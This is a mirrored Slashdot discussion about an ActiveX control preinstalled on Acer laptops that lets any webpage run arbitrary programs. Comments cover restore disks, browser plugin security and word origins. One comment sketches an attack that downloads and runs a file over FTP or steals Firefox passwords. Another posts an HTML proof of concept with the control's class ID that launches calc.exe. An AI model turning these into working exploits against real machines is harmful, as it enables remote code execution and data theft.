Slashdot Mirror
Acer May Be Bugging Computers
tomjen writes "What if a well known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"
Change Log
2006-11-19 - Public Release.
It's a good thing...Other companies like HP and Sony no longer include restore disks, so when a Windows user gets a virus that messes some system files up, they have to pay ridiculous amounts to order restore disks if they didn't remember to do it themselves.
Checked mine, its present :(
Anyone know if its safe to make that file and its registry entry 'disappear' ?
My HP notebook, bought about 15 months ago not only came with restore disks, but a plain Windows XP SP2 disk and disks for WinDVD and Sonic's CD recording software.
I don't know about SONY, but in my experience, HP are more generous than most in terms if disks included with their PCs.
I bought an HP core 2 duo media center pc back in September. Came with all the software in a special partition on the first hard drive. HP has online option to purchase restore dvds for $17 (shipping). Bought the disks just because I could. I have been running Vista RC2 o this computer and do not intend to go back. Vista is much more responsive than XP. One minor annoyance is that serial ports are no longer part of computer systems these days. I need to hook up a device that only supports serial not usb. Not all vendors are in this decade.
When I was young, I had to rub sticks together to compute.
Checked mine, its present :( Anyone know if its safe to make that file and its registry entry 'disappear' ?
Sure, just go get the Mepis Patch. This will end all of your activeX problems. It won't end your Flash, Adobe and other problems but those are minor in comparison.
Really, do you think eliminating this one control will make your computer safe? Chances are there are coppies that will "respawn" later, a common malware trick, and that there are far nastier controls you don't know about. The malice is built in from Redmod before anyone else gets it.
Friends don't help friends install M$ junk.
John
I have not seen the control or have a copy of it but it can be a simple as a couple of lines
of script in a web page. Now I can possibly own most acer laptops visiting that page.
The script could do something like this
ftp somehost
ftp get somefile
execute somefile
Bingo I own your laptop.
Or say I just ftp your firefox data so I can grab your history, passwords etc.
Got Code?
Read the article: Theres a trivial piece of example "exploit" code running calc.exe.
But as you can run ANY windows binary with any command line (at least according to the article), actual exploitation is trivial.
Test your net with Netalyzr
Apparently, someone in Brazil noticed this last November
The real "Libtards" are the Libertarians!
The class-id was in the article :-) D9998BD0-7957-11D2-8FED-00606730D3AA
Don't know about you, but I wouldn't call $20 a ridiculous amount to pay for a set of restore disks. And you can avoid paying the $20 or so by burning your own set of restore disks... my HP notebook prompted me to do so when I first turned it on. It just burns an image of the restore partition on the C: drive. If you forget or decide you want to do it later, it will/can remind you again in a couple days or so.
I think they were going for humor mods.
run regsvr32 -u lunchapp.ocx from start>run it will unload it without having to edit the registry
Snowden and Manning are heroes.
You bet open up a command window and type ftp you will notice that it has a built in ftp client. Simply calling the run method on this control in a script and you can run anything you want, download or upload anything you want just by the client browsing a web page.
Got Code?
Any mozilla extension (chrome) on mozilla/thunderbird/seamonkey/firefox/camino has access to this component which can run anything the user can.
I recently bought a laptop with Ubuntu pre-installed from The Linux Store, which is in Ontario. I've been perfectly satisfied aside from the minor point that they only offer the choice of Ubuntu and Fedora Core when I would have preferred Debian.
The right direction would be running screaming away from active X entirely.
The hatred towards ActiveX is largely unfound. What would happen to sites like YouTube or movie sites, video, audio sites, if all browsers are suddenly rendered incapable of supporting plugins.
The mistake of Microsoft was that ActiveX were way too easy to install, and this is corrected in a major way in IE7.
In fact, the plugin API and extensions of Firefox can do just as much damage and much easier (since people trust those) than ActiveX can in IE7, with all default settings.
IE7 will at least ask you now if a page wants to run an *already installed* control. Does Firefox do this? No.
(of course there's the question: should it, but apparently due to jerks that preinstall craps on laptops, yea..)
Corrupt that extra partition and see how far that "restore" disk gets you. It's not the regular Windows restore disk that used to come with computers and it's definitely not a Windows disk. It won't work without the data on the partition.
$20 for the set of disks + $52.50(Dell refunded price for Windows) is about the same price you could buy Windows XP Home OEM version for.
This allows execution of arbitrary code... that's as bad as it gets. This could be used to do anything the computer can do. All files accessible to the current user could be uploaded somewhere else; machine could be made part of a botnet for DoS attacks; anything! Arbitrary code execution is a BAD, BAD thing.
Maybe it would make more sence if you were a three or four year old kid fascinated with fire and we gave the matches to you.
And actualy the lawsuite for spilt coffee and a million bucks entailed the coffee being so hot it melted the cup were the lid fastened to it causing the spill after the compnay had been informed of the issue repeatedly and refused to do anything about it. she was only asking for medical bills and the jurry added to it. So yes, in a way, I guess this kind of relates.
This type of stuff shouldn't be able to happen after how many exploits causing malicious harm to computers. I guess the solution might be for people to stop thinking they need to upgrade or replace thir system whenever thier computers starts acting "worn out" and "slow". If someone on the supply end stops making a buck from every replacment, they might be more concerned with stoping them from breaking.
Like multiple camera angles on DVDs? There's even a 'camera' button taking up space on my remote.
"A week in the lab saves an hour in the library"
Sony and HP don't include restore disks because they're harder to keep current than a production disk image - they're DVDs, not CDs.
:-)
All you need to do is burn the images (DVDs) when you get the laptop, and Sony positively nags you repeatedly to do it. Also, if you leave the recovery partition in place you can do it again later.
As for getting the original DVDs, they don't charge a ridiculous amount (in the $60 region) but they do ask for a ridiculous amount of proof that it's your own laptop and you're not going to share the disks with the world..
Don't know about HP, but have handled enough Sony laptops
Insert
I really have a hard time understanding your mindset. You refuse to believe in the seriousness of the vuln even when people give you an attack vector example. Please, why ?
Who's talking about an exploit? I can get people "infected" with XPI the same way people get "infected" by clicking "Yes" on that annoying ActiveX install dialog. It's much easier than trying to find an exploit. But we're drifting here - the issue is a PC vendor pre-installing something on my box. That's even easier, because it doesn't require user intervention!
but there are a number of things to prevent you from actually getting it installed.
Like what, a badly designed whitelist and a dialog where you have to click "No"? And you figure that the same people who used to click "Yes" on IE will click on "No" in Firefox, correct?
Until then, your full of hot air.
I think you're taking this too personally. Social engineering and stupidity are far more profitable for spammers and scammers than any exploit Microsoft could ever dream of.
The twitter monologues. Click on my homepage and be amazed.
The code to test for the vulnerability, right from the Brazilian article about it linked on another post. Save it as an html file and browse it with IE.
A A" id="hahaha">
<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>
I concur. I'm on my HP laptop right now, which is about 20 months old. It came with only one partition, so I had to format the entire thing when I got it to repartition it--I know I could have probably used something like Partition Magic, but I'm cheap and I wanted to uninstall all the cruft, like the Sonic garbage.
The upside is that it did some with a clean* (*HP OEM) Windows XP disk. Even though it was OEM, it gave me the option to keep most of the useless HP software off.
Beyond than, no problems yet. So I'm relatively pleased with HP for once.
I work for a major retail chain that sells HP/Compaq notebooks and desktops. HP/Compaq desktops have required you to create the recovery discs for at least 3 years now, however it was not until the August/September 2005 model refresh that they stopped shipping recovery discs with their notebooks.
We don't call pig "ham" we call it "pork".
It dates back to the Norman invasion of England, pork and beef are the Norman (french) words for those animals (porc and boeuf).
Same reason why we have redundant words like big/large.
I'm no meat scientist, but I believe this is because due to the nature of a chicken, and the various preparation methods, you can say "I want chicken!" and you get chicken. While you can be more specific, 'chicken' is sufficient.
On the other hand, if you walked into a restaurant and ordered 'Pig', you might get bacon, ham, or pork. Perhaps even a pork medallion wrapped in a strip of sweet, sweet bacon.
The variety of the animal available for consumption helps shape the ordering process. At least that's all I've got.
When I read this message what popped right on my mind was the existence of an administrator account which camed pre-installed on my Acer laptop. The account is called "ASP.NET Machine A..." which is protected by a password and I'm not able to uninstall it no matter what I try. Can this be another Acer backdoor installed on their systems?
P.S.: the article's backdoor was also present on my system. those bastards...
Slashdot, fix your code or at least hire someone who is competent at it to do it for you.
Why do we call "pig" ham and "cow" beef?
It dates back to the Norman invasion (no, not Spiney, but 1066). The (primarily Norman French) aristocracy called food by the french words -- boeuf, jambon (hence ham), etc. The stuff the peasants ate, or that nobody ate (eg horse), wasn't.
BTW, the word "poultry" is similar to the french word for chicken -- poulet.
-- Alastair